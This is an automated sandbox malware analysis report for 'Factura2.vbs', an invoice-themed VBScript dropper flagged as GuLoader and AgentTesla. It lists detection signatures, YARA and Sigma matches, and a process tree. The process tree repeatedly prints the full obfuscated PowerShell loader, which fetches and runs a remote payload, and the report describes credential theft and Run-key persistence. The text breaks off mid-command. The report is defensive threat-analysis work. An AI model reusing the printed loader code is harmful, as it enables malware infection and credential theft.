Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura2.vbs

Overview

General Information

Sample name:Factura2.vbs
Analysis ID:1427893
MD5:9500105068ac091471491a1a7c9065c2
SHA1:f92e6b13cd0ae67dccebdcbbcdc5634a1c66aae8
SHA256:ebfb38c8313f04d9afc3223ef7d30908d98880d333bff470da280d472b3cc836
Tags:vbs
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6268 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout ');Saprophagan $Superincumbent163;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2536 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6136 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelogfirGa,lesTaga,[.etox$SlentNEct suGenfraAph onRelincKroniemorthrPrecieLandstBjrne]Neohi=Can e$MelloHFolkeoMeddevSaleaeSjalsdA.allvS awnrOutbukVexateAseptr.toma ');$Smoky=Pisseskn ' SubsBAud oaU,tegaLnt,ld otharBegynuKlanttB.azaeQuintnBinde. Ha dD,ejevoLumbaw,eksin Fe ilplejeo.orniaDecimdtragiFfortriHeadllThermeMeta (Under$Opsl,uCordanHummis,racuhpseu,aUdslidIongiy,ogtr,Chair$,aadvSGrievt Sn.ea,ensirPhytot ,undh AtomuR,evelPyra.l MoraeMorphrSuffr)Humif ';$Smoky=$Asseverating[1]+$Smoky;$Starthuller=$Asseverating[0];Saprophagan (Pisseskn ' Indi$ Nonmg aflalNoninoFlashb nfaaE.dotlTro,d:Inte.s Datap IndorLogicoVandbg infifStudioHarqurKendisA amok,olysePavelrDaasenskepte,nnivs odse= apni(NumerTDebone FinnsOt ertConci-H,emgPGinetaStedstAffalh .run ritar$UnmanSreva.tBrohoaOverfr,hospt Pe.ahPatroutilgalUdl,sl PeneeHairerTrste) Netv ');while (!$sprogforskernes) {Saprophagan (Pisseskn ',ivaa$RegurgFolk,l sonioSprigbElastaBrotolvalla:StaphSBr,ehu.eulob,ireetmotoro anct Br.vaKurmalRe.frlIngvai bag n CogigUnd r=Skram$TeksttR,alirPlatouSil ne Hnde ') ;Saprophagan $Smoky;Saprophagan (Pisseskn 'HubbaSResultTr quaMorskrAppaytAbrup-Pra,sS.jeldlFeasieElleveKoghepRund, Ungdo4P.irr ');Saprophagan (Pisseskn 'Super$Suggeg Ungel Pr fo psitbVandraInterlPol,f:Randss KajupflerbrSaldeoMycelgslingfRaakooG,ardr I,ess Tullkv ktoePat,orS ertnCytoleHypoasMilko= Forb(CraneTKe soeToluqsFrstetYet p-dek aPbortsaModsttDyvouhUnbu. Whats$ Hu kS ArchtGyar aZiontrActintsemmih urblu.omprl Bry.lTuyereHavburAlwin)Byste ') ;Saprophagan (Pisseskn 'Unobe$DinargRaglalTriceoJunc,b Rutiajustil Gnat: SyndZ ov roBushbcPropiaBon ml PartoBagfl=Nonp $Id.algBly alWeedeoDimitb Pre,aSporrlcos.a:DecimKJsandoBorgerChemot For l AfrigPisannLifoiiP skenMus.tg DiskePanterPo,yd+Con.u+Legi.%Behng$ CacoF hamad Sworr Fal,eSvumnn Bh.leGratuhBoligjV.inyewic,omBrand.,etincAsymmo .estu Pa lnExtentpropa ') ;$unshady=$Fdrenehjem[$Zocalo];}Saprophagan (Pisseskn 'Bolig$KjesegProevlGa,blo B.rdbPauseaStudilKenni:BramsLRegule adedn Clare.edrat Kugl Nymaa=Su.pr In,oGSpecteMela,t Ammi-AnskaCacumeoKrigsnJingstPref,ePyobanKonfetExha, Tids$ GaviSBl wttAkadea BranrKolpotBillehsk teu Per,l UntulAl,oceWa err dgif ');Saprophagan (Pisseskn 'Syr.b$sideogPondwlAposeoP,rspbUnex aSiro,lBacil:EbraiURea.tn Coa,iHelseogebyrn CirciP.seksBlasetReereeOrdner RejssAt ac Slags=Repat Borge[hoptoS Wroky rgumsParentGavekeMo.abmFlje..Pr.acC PerioremsenSurf.v BereeUgr,irBlaartPreop]Imbo : Sidd:UnemoFF,scir bil oParacmUns.oBBa,veaSchepsPalmaeAccul6Nejsi4HabilS ,teatPa ser.ntibiAn.lenScantgTutti(Lejeo$afskiLPseudeUnstanForsve roostEngsn)Elekt ');Saprophagan (Pisseskn 'Und.k$re.segtyreslH ratome iabKondeaU brilBumme:Jvn.rSGavebc S.tao amicffiordf Sings judg Ikra=Fan,a Ko po[OutrhS Nondy Posts OccitvinedeReloamHul.i.Fl,niTAquate,arnexAfprvtCafe..Gge.uESkibinA,armcD moroInropdDecori DrninSlinggHniss] Unus: marg:SoignAKrligSF.rsiCs.nspIProduIo.ymp.BrislGB,rgoeEl.stt intrSGar,etCypr.rInactiGen,anStdergForma(Immun$Oed,pUSkinbn,ptagiCohaboDemianTalleichorisAn ist SliceSkomar Pa,tsRe.im) Xant ');Saprophagan (Pisseskn 'Alter$Bacchg Hdrel SpecoAntirb CowpaGimmilLeuco:talleSfejlmuBrandp.ooeyePro orT leviKei.un bebocp ykiuSubcomFortibStikoeUly,knJapactIndre1 Muni6Bryg,3Lejek=Retss$,hiroSu.wagcRefleo EndofO,ercfLootisTeate.IndlusPa tauKredibVaca sFr igtfrkherTweeziAuditn RiflgRetal( He m3 Sy,t1Spik.5 Poly0flout7Cho.d3Nephr,Lidel2uncom7 Ko.p4Proje3Lycop0se.eh)spout ');Saprophagan $Superincumbent163;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 5700 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7068 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • newfile.exe (PID: 6368 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 3532 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • newfile.exe (PID: 6316 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi32_6136.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xe06b:$b2: ::FromBase64String(
            • 0xd146:$s1: -join
            • 0x68f2:$s4: +=
            • 0x69b4:$s4: +=
            • 0xabdb:$s4: +=
            • 0xccf8:$s4: +=
            • 0xcfe2:$s4: +=
            • 0xd128:$s4: +=
            • 0x16a40:$s4: +=
            • 0x16ac0:$s4: +=
            • 0x16b86:$s4: +=
            • 0x16c06:$s4: +=
            • 0x16ddc:$s4: +=
            • 0x16e60:$s4: +=
            • 0xd914:$e4: Get-WmiObject
            • 0xdb03:$e4: Get-Process
            • 0xdb5b:$e4: Start-Process
            • 0x1556c:$e4: Get-Process

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", ProcessId: 6268, ProcessName: wscript.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newfile\newfile.exe, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7068, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newfile
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura2.vbs", ProcessId: 6268, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan 